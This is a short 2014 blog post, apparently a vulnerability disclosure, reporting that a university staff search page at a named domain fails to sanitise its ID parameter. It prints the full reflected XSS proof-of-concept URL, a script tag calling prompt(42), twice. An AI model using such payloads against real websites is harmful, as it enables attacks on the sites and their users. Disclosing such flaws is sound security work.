Tag: cse.unsw.edu.au

Posts Tagged ‘cse.unsw.edu.au’

08 Sep 2014

The staff search page does not sanitise the input of the ID field allowing an XSS attack to be executed.

Code:

http://www.cse.unsw.edu.au/db/staff/staff.php
?ID="><script>prompt(42)</script>

1 2	http://www.cse.unsw.edu.au/db/staff/staff.php ?ID="><script>prompt(42)</script>

Posted Mo BeigiPersianMG in XSS